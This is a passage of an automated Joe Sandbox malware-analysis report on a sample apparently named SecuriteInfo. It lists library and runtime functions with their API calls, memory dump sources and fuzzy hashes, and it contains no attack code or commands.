                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 8741C962D2978183E755BB28951077AB260FBA5364F504334EB6C07AE9EFBCE0E0C710
                                                                                                                                                                                                                                    Function 00007FF7B2B6CC3C Relevance: 4.6, APIs: 3, Instructions: 94COMMON
                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2465264032.00007FF7B2B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7B2B60000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2465227661.00007FF7B2B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2465306864.00007FF7B2B8B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2465343412.00007FF7B2B9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2465343412.00007FF7B2BA2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2465412661.00007FF7B2BA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_7ff7b2b60000_SecuriteInfo.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: __scrt_acquire_startup_lock__scrt_dllmain_crt_thread_attach__scrt_get_show_window_mode__scrt_release_startup_lock
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 3251591375-0
                                                                                                                                                                                                                                    • Opcode ID: b3dd18574e8b698ea28c35ed35ed65a6730a16d6ac14c38d0a8ba428da0d66bc
                                                                                                                                                                                                                                    • Instruction ID: f3af564981e2a41177daec342e254dde0884ead19144a8ac99e121f9f7041497
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: b3dd18574e8b698ea28c35ed35ed65a6730a16d6ac14c38d0a8ba428da0d66bc
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: AF313B20E0B54345EA53BB6C94292BBE291AF63344FC44534D70D872AFFEECA404C278
                                                                                                                                                                                                                                    Function 00007FF7B2B79A30 Relevance: 4.5, APIs: 3, Instructions: 14COMMON
                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2465264032.00007FF7B2B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7B2B60000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2465227661.00007FF7B2B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2465306864.00007FF7B2B8B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2465343412.00007FF7B2B9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2465343412.00007FF7B2BA2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2465412661.00007FF7B2BA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_7ff7b2b60000_SecuriteInfo.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: Process$CurrentExitTerminate
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 1703294689-0
                                                                                                                                                                                                                                    • Opcode ID: 148d460979eed4a43ebbf671c65dc2dc638c0d89c9c01e8e00358d5495882c84
                                                                                                                                                                                                                                    • Instruction ID: ec933251847c1a2f97decf4bb4c984be7df18d857975e7150ae40beb6b0f92de
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 148d460979eed4a43ebbf671c65dc2dc638c0d89c9c01e8e00358d5495882c84
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 21D09B10B1770542EB163B7C5C5947A52555F66701F94143CCA1F5A36FFDBCA449C320
                                                                                                                                                                                                                                    Function 00007FF7B2B7013C Relevance: 3.2, APIs: 2, Instructions: 177COMMONLIBRARYCODE
                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2465264032.00007FF7B2B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7B2B60000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2465227661.00007FF7B2B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2465306864.00007FF7B2B8B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2465343412.00007FF7B2B9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2465343412.00007FF7B2BA2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2465412661.00007FF7B2BA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_7ff7b2b60000_SecuriteInfo.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 3215553584-0
                                                                                                                                                                                                                                    • Opcode ID: e80cfa20b6c7ebf2f27a6dba6ddb06cb01cda21135ba71ef9e2cf3b7629ca058
                                                                                                                                                                                                                                    • Instruction ID: a8d0da6fc7cc23490c35671d922f1718aa0cc2bb46e130e0b14c67255762ad9d
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: e80cfa20b6c7ebf2f27a6dba6ddb06cb01cda21135ba71ef9e2cf3b7629ca058
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: E851FF2170F24146EF66B92D540077BE191AF667A4F484A35DF6D077EDEEBCD440C620
                                                                                                                                                                                                                                    Function 00007FF7B2B7C134 Relevance: 3.0, APIs: 2, Instructions: 46COMMONLIBRARYCODE
                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2465264032.00007FF7B2B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7B2B60000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2465227661.00007FF7B2B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2465306864.00007FF7B2B8B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2465343412.00007FF7B2B9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2465343412.00007FF7B2BA2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2465412661.00007FF7B2BA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_7ff7b2b60000_SecuriteInfo.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: ErrorFileLastPointer
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 2976181284-0
                                                                                                                                                                                                                                    • Opcode ID: 7d52f85de62641260209e8dbb28c5e1251e01e8bf24b4306ce9dcd9badf2c9c6
                                                                                                                                                                                                                                    • Instruction ID: 4de386819421d88d66a667c305fdd340fcf208d6c4d4052a3c043b12b660e985
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 7d52f85de62641260209e8dbb28c5e1251e01e8bf24b4306ce9dcd9badf2c9c6
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: C211B96160864141DA11AB2DA41416AB361AB66FF4F944335EF7D47BEDDEBCD051C700
                                                                                                                                                                                                                                    Function 00007FF7B2B75924 Relevance: 3.0, APIs: 2, Instructions: 40timeCOMMON
                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • FileTimeToSystemTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7B2B75839), ref: 00007FF7B2B75957
                                                                                                                                                                                                                                    • SystemTimeToTzSpecificLocalTime.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7B2B75839), ref: 00007FF7B2B7596D
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2465264032.00007FF7B2B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7B2B60000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2465227661.00007FF7B2B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2465306864.00007FF7B2B8B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2465343412.00007FF7B2B9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2465343412.00007FF7B2BA2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2465412661.00007FF7B2BA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_7ff7b2b60000_SecuriteInfo.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: Time$System$FileLocalSpecific
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 1707611234-0
                                                                                                                                                                                                                                    • Opcode ID: 497c6f3b45805196ef8f930e068bad9451f3f50de380bc241881b145e929bf5b
                                                                                                                                                                                                                                    • Instruction ID: 1dc7faa6aef95a77f09d1b817e7cc3ba995d53e4890dd33416295e95c7850efd
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 497c6f3b45805196ef8f930e068bad9451f3f50de380bc241881b145e929bf5b
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 04118F2161D64282EA55AB1CA41143BF760EB96771F900236FBAD859ECFFACD414DB20
                                                                                                                                                                                                                                    Function 00007FF7B2B7A948 Relevance: 3.0, APIs: 2, Instructions: 19memoryCOMMONLIBRARYCODE
                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • RtlFreeHeap.NTDLL(?,?,?,00007FF7B2B82D22,?,?,?,00007FF7B2B82D5F,?,?,00000000,00007FF7B2B83225,?,?,?,00007FF7B2B83157), ref: 00007FF7B2B7A95E
                                                                                                                                                                                                                                    • GetLastError.KERNEL32(?,?,?,00007FF7B2B82D22,?,?,?,00007FF7B2B82D5F,?,?,00000000,00007FF7B2B83225,?,?,?,00007FF7B2B83157), ref: 00007FF7B2B7A968
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2465264032.00007FF7B2B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7B2B60000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2465227661.00007FF7B2B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2465306864.00007FF7B2B8B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2465343412.00007FF7B2B9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2465343412.00007FF7B2BA2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2465412661.00007FF7B2BA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_7ff7b2b60000_SecuriteInfo.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: ErrorFreeHeapLast
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 485612231-0
                                                                                                                                                                                                                                    • Opcode ID: 46e6024f15a2f57ad5ff64688e0fe3cec5898f8577aba2f63b046adc8766ef53
                                                                                                                                                                                                                                    • Instruction ID: 7328b5335f14f978fadc7de4fc29c1b614f877a6a55733838be0f5b991dcf43c
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 46e6024f15a2f57ad5ff64688e0fe3cec5898f8577aba2f63b046adc8766ef53
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 05E04F10E0B20242FE4B7BBD984517BA2606FA6701FC44034CB0D862B9FDAC6851C730
                                                                                                                                                                                                                                    Function 00007FF7B2B7AB58 Relevance: 2.6, APIs: 2, Instructions: 59COMMON
                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • CloseHandle.KERNELBASE(?,?,?,00007FF7B2B7A9D5,?,?,00000000,00007FF7B2B7AA8A), ref: 00007FF7B2B7ABC6
                                                                                                                                                                                                                                    • GetLastError.KERNEL32(?,?,?,00007FF7B2B7A9D5,?,?,00000000,00007FF7B2B7AA8A), ref: 00007FF7B2B7ABD0
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2465264032.00007FF7B2B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7B2B60000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2465227661.00007FF7B2B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2465306864.00007FF7B2B8B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2465343412.00007FF7B2B9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2465343412.00007FF7B2BA2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2465412661.00007FF7B2BA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_7ff7b2b60000_SecuriteInfo.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: CloseErrorHandleLast
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 918212764-0
                                                                                                                                                                                                                                    • Opcode ID: ae1e15d82824e1a5fac1c7302ca2ff5641fe0b0e43db7728cd9339717749910c
                                                                                                                                                                                                                                    • Instruction ID: 59b5ef50c0d108ecc0d47cd08d1b9d63ba2930416399e5d6fe1886c0a2f4c0a0
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: ae1e15d82824e1a5fac1c7302ca2ff5641fe0b0e43db7728cd9339717749910c
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: BA21FC20F0A64241FAD7776D94403BBA2925FA67A0F840239DB2E477EDEEECE440C310
                                                                                                                                                                                                                                    Function 00007FF7B2B7BEAC Relevance: 1.6, APIs: 1, Instructions: 112COMMONLIBRARYCODE
                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2465264032.00007FF7B2B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7B2B60000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2465227661.00007FF7B2B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2465306864.00007FF7B2B8B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2465343412.00007FF7B2B9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2465343412.00007FF7B2BA2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2465412661.00007FF7B2BA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_7ff7b2b60000_SecuriteInfo.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 3215553584-0
                                                                                                                                                                                                                                    • Opcode ID: cbeb3b5568c01fe22c816fd393b22aefbfa64644ae8ce1fe3b0dc090283c3b2e
                                                                                                                                                                                                                                    • Instruction ID: 11e717803c3fe103e66090c19bca8d724c148768f7d4a34f0eb454ef87364c13
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: cbeb3b5568c01fe22c816fd393b22aefbfa64644ae8ce1fe3b0dc090283c3b2e
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 4741D83290A24187EA75BA1DA44017EF360EB67B50F940131DB8E476EDEFACE402CF60
                                                                                                                                                                                                                                    Function 00007FF7B2B67F90 Relevance: 1.6, APIs: 1, Instructions: 85COMMON
                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2465264032.00007FF7B2B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7B2B60000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2465227661.00007FF7B2B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2465306864.00007FF7B2B8B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2465343412.00007FF7B2B9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2465343412.00007FF7B2BA2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2465412661.00007FF7B2BA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_7ff7b2b60000_SecuriteInfo.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: _fread_nolock
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 840049012-0
                                                                                                                                                                                                                                    • Opcode ID: 34b4addda2765862907a3b81e979866922c1056fd338e6a2004f4fdcbc6c49b5
                                                                                                                                                                                                                                    • Instruction ID: c7b40a920e8ba4471ae5cea794db5af0772afda13ad2f2975ca09efdb3ec48fd
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 34b4addda2765862907a3b81e979866922c1056fd338e6a2004f4fdcbc6c49b5
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: A621B421B1A65146FE12BA2A64043BBE651BF56BC4FC85D31EF0C4B78AEEBDE045C314
                                                                                                                                                                                                                                    Function 00007FF7B2B7B93C Relevance: 1.6, APIs: 1, Instructions: 79COMMONLIBRARYCODE
                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2465264032.00007FF7B2B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7B2B60000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2465227661.00007FF7B2B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2465306864.00007FF7B2B8B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2465343412.00007FF7B2B9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2465343412.00007FF7B2BA2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2465412661.00007FF7B2BA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_7ff7b2b60000_SecuriteInfo.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 3215553584-0
                                                                                                                                                                                                                                    • Opcode ID: c2d01373d3233558d420055387ebca2c39d1ce99b2c1a08127fa32cb0ba5fec2
                                                                                                                                                                                                                                    • Instruction ID: 334d9ec49b9f0bec4668ba8a6a20c87f2549fad78403424e4908ab5d3a087571
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: c2d01373d3233558d420055387ebca2c39d1ce99b2c1a08127fa32cb0ba5fec2
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 2231B422A1961185F6577B5D844037EB660AF62B61FC10135EB2D073FAEEFCA441CB31
                                                                                                                                                                                                                                    Function 00007FF7B2B79961 Relevance: 1.6, APIs: 1, Instructions: 61COMMON
                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2465264032.00007FF7B2B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7B2B60000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2465227661.00007FF7B2B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2465306864.00007FF7B2B8B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2465343412.00007FF7B2B9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2465343412.00007FF7B2BA2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2465412661.00007FF7B2BA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_7ff7b2b60000_SecuriteInfo.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: HandleModule$AddressFreeLibraryProc
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 3947729631-0
                                                                                                                                                                                                                                    • Opcode ID: 42808d7c08696a35870eb95595f0ae95ff90971c005bfc8769c42bb91e99b0de
                                                                                                                                                                                                                                    • Instruction ID: f56cbef254075cacb59bf2bfae12ff5dbf098cdb6a0b6e40a100ed84839563cb
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 42808d7c08696a35870eb95595f0ae95ff90971c005bfc8769c42bb91e99b0de
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 2A21D172A06B4589FB22AF6CC0802ED33A0FB15718F840636D76C06BE9EFB8D544C750
                                                                                                                                                                                                                                    Function 00007FF7B2B75F94 Relevance: 1.6, APIs: 1, Instructions: 55COMMON
                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2465264032.00007FF7B2B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7B2B60000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2465227661.00007FF7B2B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2465306864.00007FF7B2B8B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2465343412.00007FF7B2B9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2465343412.00007FF7B2BA2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2465412661.00007FF7B2BA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_7ff7b2b60000_SecuriteInfo.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 3215553584-0
                                                                                                                                                                                                                                    • Opcode ID: d0ecc1d4814c8292f6d285d86e9f4332b8d7141ecd04c52723bb65a1ba9d936a
                                                                                                                                                                                                                                    • Instruction ID: eed8ff58d0fa03ff6c16851f530fbb338976e11d3655b6aef7aea8bbb7898440
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: d0ecc1d4814c8292f6d285d86e9f4332b8d7141ecd04c52723bb65a1ba9d936a
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 5E115321A2E64141EA62BF1D940057BE264AFA6B84FC44435EF5C5BABDEFBCD440C720
                                                                                                                                                                                                                                    Function 00007FF7B2B86354 Relevance: 1.6, APIs: 1, Instructions: 54COMMON
                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2465264032.00007FF7B2B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7B2B60000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2465227661.00007FF7B2B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2465306864.00007FF7B2B8B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2465343412.00007FF7B2B9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2465343412.00007FF7B2BA2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2465412661.00007FF7B2BA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_7ff7b2b60000_SecuriteInfo.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 3215553584-0
                                                                                                                                                                                                                                    • Opcode ID: 3765a10cee1e255344ee37f065f4be71d58868c9c9e645b3056c9746d3493235
                                                                                                                                                                                                                                    • Instruction ID: 7543b3986f57d9dc492dd4784539977a39dca3dbd745c335bba1c435759a8885
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 3765a10cee1e255344ee37f065f4be71d58868c9c9e645b3056c9746d3493235
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 3A21C832A09A4186D762AF1CD44437AB6A0FBA9B54F98423CE76D4B6DDEF7CD401CB10
                                                                                                                                                                                                                                    Function 00007FF7B2B703BC Relevance: 1.5, APIs: 1, Instructions: 48COMMONLIBRARYCODE
                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2465264032.00007FF7B2B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7B2B60000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2465227661.00007FF7B2B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2465306864.00007FF7B2B8B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2465343412.00007FF7B2B9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2465343412.00007FF7B2BA2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2465412661.00007FF7B2BA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
